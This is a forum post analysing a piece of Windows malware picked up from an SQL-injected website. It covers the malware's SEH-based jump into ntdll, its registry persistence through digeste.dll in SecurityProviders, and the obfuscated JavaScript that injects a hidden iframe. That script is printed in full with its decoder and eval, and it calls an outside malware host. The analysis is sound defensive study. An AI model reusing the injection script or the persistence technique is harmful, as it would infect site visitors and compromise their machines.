Quote:
[Originally Posted by evaluator]
Kayaker, you will click on logo_hearts! so niiiiiiiceee.. |
Aaaahh, how sweet..
Youandme.exe. Keeps changing its name. Looks like the fake Obama site has disappeared too.
OK, I've got one for you Eval-Unpucks-In-Sleep-uator.
I've never seen this before either. A funky bit of code which manipulates offsets and memory addresses to directly jump to a CALL ECX instruction in ntdll. The value of ECX is set to an address in the 40xxxx range.
At the start of the malware an SEH is set (at 4010F9) and an invalid instruction is run which triggers the SEH. In the SEH you quickly reach the instruction:
Code:
:00401146 FF E0 jmp eax
EAX at this point has been adjusted to be 7C9037BD, and ECX is 401888.
Therefore the JMP EAX directly calls the following instruction in ntdll, with the CALL ECX offset being 401888:
Code:
:u eax (Softice)
:7C9037BD FFD1 CALL ECX ; 401888
:7C9037BF 648B2500000000 MOV ESP,FS:[00000000]
:7C9037C6 648F0500000000 POP DWORD PTR FS:[00000000]
:7C9037CD 8BE5 MOV ESP,EBP
:7C9037CF 5D POP EBP
:7C9037D0 C21400 RET 0014
That CALL ECX is part of the larger ntdll function ExecuteHandler2:
Code:
:7C903799 ExecuteHandler2@20 proc near ; CODE XREF: ExecuteHandler@20+1F
:7C903799
:7C903799 arg_0 = dword ptr 8
:7C903799 arg_4 = dword ptr 0Ch
:7C903799 arg_8 = dword ptr 10h
:7C903799 arg_C = dword ptr 14h
:7C903799 arg_10 = dword ptr 18h
:7C903799
:7C903799 push ebp
:7C90379A mov ebp, esp
:7C90379C push [ebp+arg_4]
:7C90379F push edx
:7C9037A0 push large dword ptr fs:0
:7C9037A7 mov large fs:0, esp
:7C9037AE push [ebp+arg_C]
:7C9037B1 push [ebp+arg_8]
:7C9037B4 push [ebp+arg_4]
:7C9037B7 push [ebp+arg_0]
:7C9037BA mov ecx, [ebp+arg_10]
:7C9037BD call ecx
:7C9037BF mov esp, large fs:0
:7C9037C6 pop large dword ptr fs:0
:7C9037CD mov esp, ebp
:7C9037CF pop ebp
:7C9037D0 retn 14h
:7C9037D0 ExecuteHandler2@20 endp
Sure enough this works. Even though the execution path goes from 401146 to the middle of an ntdll function (which immediately Calls to 401888), the ntdll function does eventually return with all the correct stack back into 40xxxx, and things continue on their merry way.
Here's the story behind the malware. I was browsing around, with Opera, and hit on an sql injected website which had an Iframe exploit embedded in it.
Suddenly ZoneAlarm warned me of some exe wanting to run within svchost.exe, and do I want to allow it? Duh. No. Turns out it had already modified my registry, but I was able to catch everything it had done before there was any permanent damage.
The exe file runs from "C:\Documents and Settings\MYOB\Local Settings\Temp\wJQs.exe" and copies itself to %windir%/digeste.dll.
The exe and dll file are identical except for the PE.Characteristics byte.
It modifies the key (the first 4 entries in the list are OK)
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SecurityProviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll,
digeste.dll"
That's it. Search around for "digeste.dll" for further info.
To debug the Iframe javascript I dumped it (from the source of the site page I had browsed to) into a blank html file. I then added a
window.alert popup box command to display the decoded Iframe, as well as a
document.writeln command to display the Math.random result.
I know there are plugins and such to decode JS, but this direct method was just as easy. There were actually 2 JS instances, both almost identical, so I only include one.
Here is the Iframe exploit. If you wish to run it, it will simply display a message box with the decoded Iframe, then the random number in the html page. And of course it will attempt to connect to http://7speed.info, but I don't believe the site exists any longer, but do disconnect from the net if you like.
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<script language=JavaScript>
function uawebnb25(z)
{
var c=z.length;
var m=1024;
var i,s,h,b=0;
var w=0,x=0;
var d=Array(63,49,23,17,58,10,32,61,12,50,0,0,0,0,0,0,29,35,39,56,27,14,36,47,55,53,54,38,57,20,7,18,37, 60,6,13,9,45,40,5,52,11,34,0,0,0,0,28,0,26,15,33,41,30,44,24,42,25,3,2,43,4,51,21,46,1,16,48,62,59,2 2,8,31,19,0);
for(s=Math.ceil(c/m); s>0; s--)
{
h='';
for(i=Math.min(c,m); i>0; i--,c--)
{
{
x|=(d[z.charCodeAt(b++)-48])<<w;
if(w)
{
h+=String.fromCharCode(231^x&255);
x>>=8;
w-=2
}else{
w=6
}
}
}
// START DEBUGGING
//document.writeln("h = " + h + "<br>"

; // h = window.status='Done';document.write('')
window.alert(h);
// window.status='Done';document.write('<iframe name=356159
// src="http://7speed.info/t/?'+Math.round(Math.random()*29463)+'356159'+'"
// width=427 height=69 style="display:none"></iframe>')
var x;
x = Math.round(Math.random()*29463)+'356159';
document.writeln("x = " + x + "<br>"

;
// x = 10906356159; x = 677356159, etc.
// END DEBUGGING
eval(h);
}
}
uawebnb25('r4gZjZwFTyLFREdFMhSsAZgZkk8HjZwcOhV6TEi9rvdAy5CnzGUAqvdc55C1TaVZkhSIONUIOu71MvTca2QAyELP@ A89ryLPk5C6TugZqZw9yZ8JznfhRELAT2TZOKC6blhcytg9oagZjZVZbu_nou7X3yUn8j8IONUIOuSs8j_1NjdAjELAab@IrxQAk 4w6bEdJ3u71MEdBY5VJWbVAMeLZR4iHTZgZkv_JDAfAqvdc55gJzu8')
</script>
</body>
</html>
The attachment contains the exe, dll and the above html file renamed as *.txt
Password:
malware